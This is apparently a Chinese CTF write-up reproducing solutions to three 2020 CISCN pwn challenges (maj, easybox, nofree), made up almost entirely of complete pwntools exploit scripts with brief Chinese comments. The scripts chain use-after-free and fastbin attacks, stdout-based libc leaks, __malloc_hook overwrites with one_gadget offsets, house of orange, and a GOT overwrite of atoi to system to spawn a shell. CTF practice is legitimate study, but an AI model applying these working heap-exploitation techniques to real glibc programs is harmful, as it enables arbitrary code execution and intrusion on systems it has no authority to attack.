2020CISCN-PWN复现

2020国赛初赛pwn复现(部分)

maj

#!/usr/bin/env python                                                                                                           # -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

context.terminal = ['tmux','splitw','-v']
context.log_level = 'info'

io = process('./pwn')
elf = ELF('./pwn',checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
one = [0x45226,0x4527a,0xf0364,0xf1207]

def add(size,tag,ch=1):
    io.sendlineafter('>> ','1')
    if ch == 1:
        io.sendlineafter('question\n\n','81')
        io.sendlineafter('?\n',str(size))
        io.sendlineafter('?\n',tag)
    else:
        io.sendlineafter('question\n','81')
        io.sendlineafter('?',str(size))
        io.sendlineafter('?',tag)



def dele(idx,ch=1):
    io.sendlineafter('>> ','2')
    if ch == 1:
        io.sendlineafter('index ?\n',str(idx))
    else:
        io.sendlineafter('index ?',str(idx))

def edit(idx,con,ch=1):
    io.sendlineafter('>> ','4')
    if ch==1:
        io.sendlineafter('index ?\n',str(idx))
        io.sendafter('content ?\n',con)
    else:
        io.sendlineafter('index ?',str(idx))
        io.sendafter('content ?',con)

def pwn():                         
    add(0x68,'0')
    add(0x80,'1')
    add(0x68,'2')
    add(0,'gap-#3')
    #gdb.attach(io)
    dele(1)
    add(0x68,'4')
    dele(0)
    dele(2)
    edit(2,'\x70')

    edit(4,'\xdd\xa5')
    add(0x68,'5')
    add(0x68,'6') #also is 1 and 4
    add(0x68,'7') #get stdout

    edit(7,'a'*51+p64(0xfbad1800)+p64(0)*3+'\x48')
    #print io.recv()
    libc_base = u64(io.recvuntil('\x7f').ljust(8,'\x00'))-3954339

    log.success('libc: '+hex(libc_base))
    malloc_hook = libc_base + libc.sym['__malloc_hook']

    dele(5,2)
    edit(5,p64(malloc_hook-0x23),2)
    add(0x68,'8',2)
    add(0x68,'9',2)
    edit(9,0x13*'A'+p64(libc_base+one[3]),2)
    io.sendlineafter('>> ','1')
    io.sendlineafter('question\n','81')
    io.sendlineafter('?','10')


while True:
    try:
        pwn()
    except:
        io.close()
        io = process('./pwn')
        continue
    else:
        break
io.interactive()

ps：对于这个UAF的利用，从网上找了一份别人的方法
		p=process('./pwn')
		Add(0x60,'a'*0x10)#0
		Add(0x60,'a'*0x10)#1
		Add(0x90,'a'*0x10)#2
		Add(0x60,'a'*0x10)#3
 
		Del(2)
		Edit(2,p64(0x71)+'\xdd\x25')
 
		Del(0)
		Del(1)
		Del(0)
 
		Edit(1,'\xe8') #fake chunk 头地址

在已经进入unsortedbin的chunk中构造一个fake fastchunk
fd改为0x71当作size，改bk为fakechunk的fd
然后链入fastbin进行fastbin attachk ，smart！

easybox

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-
# tag : successfully getshll
from pwn import *

context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'

io = process('./pwn')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./pwn')
one = [0x45226,0x4527a,0xf0364,0xf1207]

def add(idx,size,con,ch=1):
    if ch == 1:
        io.sendlineafter('>>>\n','1')
        io.sendlineafter('idx:\n',str(idx))
        io.sendlineafter('len:\n',str(size))
        io.sendafter('content:\n',con)
    else:
        io.sendlineafter('>>>','1')
        io.sendlineafter('idx:',str(idx))
        io.sendlineafter('len:',str(size))
        io.sendafter('content:',con)

def dele(idx,ch=1):
    if ch == 1:
        io.sendlineafter('>>>\n','2')
        io.sendlineafter('idx:\n',str(idx))
    else:
        io.sendlineafter('>>>','2')
        io.sendlineafter('idx:',str(idx))

def writeSize(byte):
    dele(1)
    add(1,0x18,0x18*'A'+byte)

def writeSize2(byte):
    dele(1,2)
    add(1,0x18,0x18*'A'+byte,2)

add(0,0x28,'aaa')                                                                                                               
add(1,0x18,'aaa')
add(2,0x68,'aaa')
add(3,0x58,'bbb')
add(4,0x10,'bbb') #gap

dele(2)
dele(0)
add(0,0x28,0x28*'A'+p8(0xf1))

#unsort overlap
dele(1)
add(1,0x18,'bbb')
add(5,0xc0,'\xdd\xa5')
#write size and alloc it,then fake chunk is head of fastbin
writeSize('\x71')

add(6,0x68,'junk')
#write back to normal
writeSize('\xd1')
add(7,0x68,51*'\x00'+p64(0xfbad1800)+p64(0)*3+'\x48')

libc_base = u64(io.recv(6).ljust(8,'\x00')) -3954339
log.success('libc:'+hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']

writeSize2('\x71')
#dele 6 (2)
io.sendline('2')
io.sendlineafter('idx:','6')

dele(0,2)
add(0,0x28,0x28*'A'+'\xf1',2)
dele(1,2)
add(1,0x18,'aaa',2)
add(5,0xc0,p64(malloc_hook-0x23),2)
writeSize2('\x71')
add(6,0x68,'junk',2)
writeSize2('\xd1')
#attack
add(8,0x68,0x13*'\x00'+p64(one[3]+libc_base),2)
#trigger
io.sendlineafter('>>>','1')
io.sendlineafter('idx:','9')
io.sendlineafter('len:','16')
io.interactive()

nofree

题如其名，方法: house of orange

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'

io = process('./nofree')
elf = ELF('./nofree')
libc  = ELF('/lib/x86_64-linux-gnu/libc.so.6')

infoArray = 0x6020C0+256

def add(idx,size,con):
    io.sendlineafter('>> ','1')
    io.sendlineafter('idx: ',str(idx))
    io.sendlineafter('size: ',str(size))
    io.sendafter('content: ',con)

def edit(idx,con):
    io.sendlineafter('>> ','2')
    io.sendlineafter('idx: ',str(idx))
    io.sendafter('content: ',con)


for i in range(24):
    add(2,0x90,'a'*0x90)

add(2,0x90,'0'*0x20)
add(2,0x90,'overflow'.ljust(0x30,'a'))
edit(2,'a'*0x38+p64(0x91))

#trigger free.
add(1,0x90,'a'*0x90) #junk chunk
add(0,0x70,'writegot')
#write fd
edit(2,'A'*0x38+p64(0x71)+p64(infoArray))

#1 is useless
add(1,0x60,'a'*0x60)
add(0,0x90,'A'*0x60)

#edit 0 to modify got
edit(0,p64(elf.got['atoi'])+p64(0x100))
#write atoi's got as printf
edit(1,p64(elf.plt['printf']))
#leak libc
io.sendlineafter('>> ','1')
io.sendlineafter('idx: ','%25$p')
libc_start_main = int(io.recvline().strip(),16)-240
libc_base = libc_start_main - libc.sym['__libc_start_main']
log.success('libc : '+hex(libc_base))
system = libc_base + libc.sym['system']

#write  atoi to system, use printf's return value to select
io.sendlineafter('>> ','2')
io.sendafter('idx: ','2')
io.sendafter('content: ',p64(system))
io.sendlineafter('>> ','/bin/sh\x00')
io.interactive()